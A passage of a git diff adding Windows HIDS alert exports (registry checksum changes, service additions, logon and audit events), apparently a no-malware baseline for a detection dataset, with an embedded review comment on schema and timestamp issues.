checksum changed. 
+Old md5sum was: '1ff9d2bcd158e032084b85e368bbbc93' +New md5sum is : 'c4a30b975b2c0786f6f63a3650f75cdc' +Old sha1sum was: '654be9998073db5fb7eb1b02ce093e6875191b0a' +New sha1sum is : 'f72f7e82670f1f5b204bdea42f03eaf88a1be25a' +" +"Apr 4, 2020 @ 13:48:04.316",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '59c3dc20f6ca7bf5d3e4497b0fbb523a' +New md5sum is : 'd40daa86f02d44c2784d12f3fcc3ba70' +Old sha1sum was: '21fd5eb9f4366c737be868e4d053798ae111f329' +New sha1sum is : 'e7f83fee3e29992230a88e8c874f2286d848ca41' +" +"Apr 4, 2020 @ 13:48:03.895",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'd4e36f3a15fd44265b8465f9557ea88d' +New md5sum is : '3b8f384faddd1b2b278532e07f4eba7c' +Old sha1sum was: '452ac62117c54d53212a78a079263bb0875839f1' +New sha1sum is : '4fc48b1760cc5d5d048ac83bfe6b5f988ee917b5' +" +"Apr 4, 2020 @ 13:48:03.832",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'b53bf2f3f61682c350be645945192116' +New md5sum is : 'd986956d161956f4b141437fa08b93c0' +Old sha1sum was: 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +New sha1sum is : '5233ab213dffc9768aad8b2621a3d7286c52d461' +" +"Apr 4, 2020 @ 13:48:03.191",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 13:47:57.178",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:57.158",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29d4d\Security' was added. 
+" +"Apr 4, 2020 @ 13:47:56.582",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:56.566",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:54.801",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:54.786",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:52.426",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'a34f50b409ff791b8ca73db3b1ca0733' +New md5sum is : '2beea24891ee67800c0545caeb2000c6' +Old sha1sum was: 'ef5248efe24d4437def466d2cef3295c26f57ead' +New sha1sum is : '0de58e5e9b71059260e9c9fb37cd996f349c7bd0' +" +"Apr 4, 2020 @ 13:47:51.051",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '1e6e38e0129cb1178036ce2d2de63896' +New md5sum is : '56e9f0a7add3da7f007b812f71fed075' +Old sha1sum was: 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +New sha1sum is : 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +" +"Apr 4, 2020 @ 13:47:50.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '9899f0d851a544118a1df10180c84633' +New md5sum is : '02ce0e33acbb815a7da890475fdcdf10' +Old sha1sum was: '495d124fb9a33489fca070669c53f629787f537f' +New sha1sum is : '67728c73dace4ee9f2461f6f5d1cda14f5a9b9d2' +" +"Apr 4, 2020 @ 13:47:49.583",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
+Old md5sum was: '59b12546060e1abacf07181ecdab1088' +New md5sum is : '6f1747e10ba929b2c471cd607bd70111' +Old sha1sum was: 'd4b00ea9b57b4fa8d52f007174e8a4fa9c806927' +New sha1sum is : 'd81ed24b00b17432aecc17d9fa68b788a2264d11' +" +"Apr 4, 2020 @ 13:47:49.388",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:49.373",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29d4d\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 13:47:49.347",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:41.941",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'ae2d280bcb1d70c8d8c9440f99e7346f' +New md5sum is : '476d7df2b152a9b2d97a5f0924d0244d' +Old sha1sum was: '5e5d8fc3198d01bfeb0b40c7b5b2377aa397ca0b' +New sha1sum is : 'c17a17f15fbb04638a03ca4ea386c67f34deac53' +" +"Apr 4, 2020 @ 13:47:40.566",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: 'a34f50b409ff791b8ca73db3b1ca0733' +New md5sum is : '2beea24891ee67800c0545caeb2000c6' +Old sha1sum was: 'ef5248efe24d4437def466d2cef3295c26f57ead' +New sha1sum is : '0de58e5e9b71059260e9c9fb37cd996f349c7bd0' +" +"Apr 4, 2020 @ 13:47:38.004",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'e539e5588ade4fc950140b672a9b4a8e' +New md5sum is : 'c275c91ca37799a2aa9ac60794b8f614' +Old sha1sum was: '5aff67900ed86033e13fa95ee5d8cddc4bf716f6' +New sha1sum is : '27e1f817f3fc20b0a749b234646a654859adc1ac' +" +"Apr 4, 2020 @ 13:47:37.395",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'a34f50b409ff791b8ca73db3b1ca0733' +New md5sum is : '2beea24891ee67800c0545caeb2000c6' +Old sha1sum was: 'ef5248efe24d4437def466d2cef3295c26f57ead' +New sha1sum is : '0de58e5e9b71059260e9c9fb37cd996f349c7bd0' +" +"Apr 4, 2020 @ 13:47:34.036",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:47:28.770",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'e8b3d7e25b8fb5dd2b186e056006ffd4' +New md5sum is : '7240a18caf04121b74478e7da7e0eddf' +Old sha1sum was: 'b321fb7cfcf165737c087395491ecb8c386e9010' +New sha1sum is : 'de75c9a9e7459b4a609c6d023194a2488b0674b2' +" +"Apr 4, 2020 @ 13:47:21.504",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DsmSvc\State' checksum changed. +Old md5sum was: '63455c20cde548e288f8dba9a00dd33b' +New md5sum is : '760a4bada178d4343aea42eba0843c6c' +Old sha1sum was: '28420a387fa959459932089a9494e96fcc914797' +New sha1sum is : '52d66aacb149b05f27bc68ebecd67c04e65c70a2' +" +"Apr 4, 2020 @ 13:47:20.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '5d59f40e382b0bd5741c31b20dc9877d' +New md5sum is : 'f4721c75c25d3019e13727c4564e8b2f' +Old sha1sum was: '35a4b6689f4c1e64b1097375ed53f30de17c00da' +New sha1sum is : 'a084eccb913b5a0a6c991c6e9802c2585257376e' +" +"Apr 4, 2020 @ 13:47:19.239",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:19.223",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:19.161",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:19.145",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:18.926",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:18.897",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:18.286",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:18.271",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:18.122",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:18.113",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29d4d\Security' was added. 
+" +"Apr 4, 2020 @ 13:47:17.910",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'f831bbb4b4e3aa71d36063136978431b' +New md5sum is : '660c9a37dafe24ad7d156238c5a03fd6' +Old sha1sum was: 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +New sha1sum is : '43d141d31fb892a664f9b819e3cf8f0a06efe4f2' +" +"Apr 4, 2020 @ 13:47:16.645",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:16.629",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:16.488",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:16.473",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:16.404",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:16.380",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:13.478",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:13.456",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 13:47:13.421",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\3' was added. 
+" +"Apr 4, 2020 @ 13:47:13.401",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 13:47:13.380",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 13:47:13.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 13:47:13.341",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:12.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:12.334",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:12.051",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '0fbd85d390c648f73d243e459fc4c439' +New md5sum is : '6f34b4bb3938c2ff6084d0e75b760f95' +Old sha1sum was: '4cfcff84f3698f6a858f7a5799d31fc7d81426df' +New sha1sum is : 'dfbd33c8174b1de1278046c9f798a3f5ae1bb7f9' +" +"Apr 4, 2020 @ 13:47:12.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: 'd27ed1a432d89e8be52f17c1744a38bc' +New md5sum is : 'fb459385be06365d0ed41734e9b9fe7d' +Old sha1sum was: 'f5193efad00e671e9802d94baecb86989890a7f3' +New sha1sum is : '68b8a07ed62540dbd0dbecfd90235f9da9159a35' +" +"Apr 4, 2020 @ 13:47:11.989",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '96524085ad01638d29a94ea6811680f0' +New md5sum is : '2ffb7d4daf513b355e485a82a1be52f5' +Old sha1sum was: 'd60d212b81c6fa16646c5fc9724e1eb7edba2639' +New sha1sum is : '45208235c4ca115bed4ae945dc532b5ccfbcafd1' +" +"Apr 4, 2020 @ 13:47:09.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:09.333",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:02.473",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:46:26.083",3,"Windows User Logoff", +"Apr 4, 2020 @ 13:46:26.067",3,"Windows User Logoff", +"Apr 4, 2020 @ 13:46:26.022",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:46:25.990",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:46:24.781",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 13:45:56.068",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:56.037",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 13:45:53.396",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 13:45:39.458",3,"The Windows Search Service started", +"Apr 4, 2020 @ 13:45:39.443",3,"The database engine attached a database", +"Apr 4, 2020 @ 13:45:39.297",3,"The database engine has completed recovery steps", +"Apr 4, 2020 @ 13:45:39.147",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log", +"Apr 4, 2020 @ 13:45:39.127",9,"Windows Application error event", +"Apr 4, 2020 @ 13:45:39.085",9,"Windows Application error event", 
+"Apr 4, 2020 @ 13:45:39.045",9,"Windows Application error event", +"Apr 4, 2020 @ 13:45:38.999",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:38.945",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:38.836",3,"The database engine is initiating recovery steps", +"Apr 4, 2020 @ 13:45:38.751",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 13:45:35.465",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 13:45:34.713",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:45:34.700",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:45:34.593",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:34.436",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 13:45:32.280",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 13:44:52.877",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 13:44:52.720",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 13:43:51.842",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:43:47.587",3,"Service startup type was changed", diff --git a/data/NULLTEST_HIDS_2.csv b/data/NULLTEST_HIDS_2.csv new file mode 100644 index 0000000..ea3358b --- /dev/null +++ b/data/NULLTEST_HIDS_2.csv 
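Review bot: `data/NULLTEST_HIDS_1.csv` is written with four columns (`timestamp,"rule.level","rule.description","full_log"`) while the `NULLTEST_HIDS_2.csv` section that follows opens with a fifth column, `"data.win.system.message"`, so the two baseline exports do not share a schema and a loader with a fixed column list will break on one of them; either re-export both with the same field set or document the difference next to the files. Separately, this no-malware baseline already contains level-7 `Integrity checksum changed.` events for `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules` and `[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon`, which means those rule hits on their own are not evidence of sample activity in the per-sample HIDS exports and detection results should be derived as a difference against this baseline. The timestamps are in the Kibana display form (`Apr 4, 2020 @ 13:51:18.516`) with no time zone, which makes correlation with the NIDS `@timestamp` column depend on undocumented assumptions; a note on the zone used for the exports would help.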
@@ -0,0 +1,1949 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 10:32:12.630",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '2d06df654a5682deb631986d5e100e06' +New md5sum is : '56964b8b919146ca6cc9ba7178dd83a5' +Old sha1sum was: 'fad4ff695b75db7b46758e17f337de0152aa22a4' +New sha1sum is : '2df5a62e483eea805585c37dca6c9f1db2862114' +", +"Apr 24, 2020 @ 10:32:12.614",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '0507a05dac0cb01533bea9c7856dd320' +New md5sum is : 'bab496d513226eb473b16a89f761c50b' +Old sha1sum was: 'be87be8572a241e55153e65f30b0e97ba6d756d2' +New sha1sum is : 'cb245448d7f93975cecec7d7b19de4fc8a559508' +", +"Apr 24, 2020 @ 10:32:07.179",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: '06f5c6f330af834dd08ce904d9ae7cc8' +New md5sum is : 'f5ea91602eb594fc2b4973f59a513fcb' +Old sha1sum was: '0cf4c4c19a1201e41b9deba273320298f4f97b50' +New sha1sum is : '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +", +"Apr 24, 2020 @ 10:31:58.848",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5689c2dd6ed61a04cc389b6099c0aea5' +New md5sum is : '635e192cad83fcc0e1b59bc4458960b4' +Old sha1sum was: '64932df77c40a56e97edb3553ce359b3aaff132e' +New sha1sum is : 'e0e382309ad45d83861d26b3d86c0fab6345eb7b' +", +"Apr 24, 2020 @ 10:31:58.802",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: '5b91e535422785d7409df5362ceec530' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '4e27ba555e6d427aef066e320154eafec1fd64e2' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 10:31:44.644",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' was added. +", +"Apr 24, 2020 @ 10:31:35.863",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:31Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:31:32.598",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '8689e28cb67cdeb16cd0f213c561238e' +New md5sum is : '7623ffed143b7459169ba5677dbcbf32' +Old sha1sum was: '9a0d97c845587be7605acb61023bb439126934df' +New sha1sum is : '0a808618d3ad142d9f619d043ca088fdcfc9a841' +", +"Apr 24, 2020 @ 10:31:29.426",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """ +"Apr 24, 2020 @ 10:31:19.430",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Chrome' checksum changed. +Old md5sum was: '5af3a18aae7113a12564a454973b2929' +New md5sum is : '22ece9a19429dc28f03e236b27d22f81' +Old sha1sum was: '0a00a2e519a32df06bc9533712e616c7a04e7c55' +New sha1sum is : 'd43b78e147f35d6834e93dded1d3c6395c512b09' +", +"Apr 24, 2020 @ 10:31:08.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '164ddf65a0229b0a5673d9643fd360a5' +New md5sum is : '9f0f9f207f2d810a4ae3c4b3cbab8c7c' +Old sha1sum was: 'abc03ba9189e8ab0e57d2f28ac2a9479d27eb1de' +New sha1sum is : '888bf3834cb974e6c6f05e415c259a853bc588a5' +", +"Apr 24, 2020 @ 10:30:32.951",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:31Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:30:26.085",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. 
+ +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:30:08.543",5,"Windows System error event",,"""The server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register with DCOM within the required timeout.""" +"Apr 24, 2020 @ 10:30:00.579",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"Apr 24, 2020 @ 10:29:36.027",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:34Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:29:34.213",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 10:29:31.088",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 10:29:04.455",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 10:28:43.391",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:28:43.375",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:28:33.781",5,"File added to the system.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +", +"Apr 24, 2020 @ 10:28:33.752",5,"File added to the system.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +", +"Apr 24, 2020 @ 10:28:33.475",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. 
+Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '1af7f0914012f801bdabc07119bd84db' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +", +"Apr 24, 2020 @ 10:28:32.194",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : '1e9409baa8b68f8d5dfa081e75151003' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : '25555a4f57a7b2144caabaf450eb56fe7119a8c0' +", +"Apr 24, 2020 @ 10:28:32.180",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '4c17291dcd0de9eb46f1bf8312d3f109' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'a02aa7cd463261dc68ec18a39291b1918d32122d' +", +"Apr 24, 2020 @ 10:28:30.925",3,"Windows Logon Success",,"""An account was successfully logged on. 
